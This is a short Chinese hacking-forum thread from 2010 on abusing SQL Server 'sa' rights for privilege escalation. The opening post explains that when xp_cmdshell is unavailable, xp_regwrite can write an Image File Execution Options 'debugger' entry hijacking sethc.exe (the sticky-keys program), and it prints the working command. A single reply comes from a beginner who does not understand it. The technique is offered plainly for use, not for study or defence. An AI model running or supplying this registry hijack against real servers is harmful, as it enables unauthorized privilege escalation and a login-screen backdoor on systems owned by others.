WPE|52wpe|我爱WPE

 找回密码
 注册会员
搜索
  • 2284查看
  • 1回复

主题

好友

4976

积分

论坛元老

发表于 2010-1-23 20:44:47 |显示全部楼层
sa权限如果xp_cmdshell不可用时,可以尝试用xp_regwrite写注册表,替换sethc.exe实现提权。

代码如下:sa提权技巧之xp_regwrite 替换sethc.exe


xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','reg_sz','c:\windows\system32\taskmgr.exe'

主题

好友

1866

积分

金牌会员

发表于 2010-1-23 23:45:50 |显示全部楼层
看不懂 刚学这行
回复

使用道具 举报

快速发帖

您需要登录后才可以回帖 登录 | 注册会员

手机版|Archiver|WPE|52wpe|我爱WPE ( 闽ICP备15009081号 )

GMT+8, 2024-4-29 06:08 , Processed in 0.060960 second(s), 16 queries .

返回顶部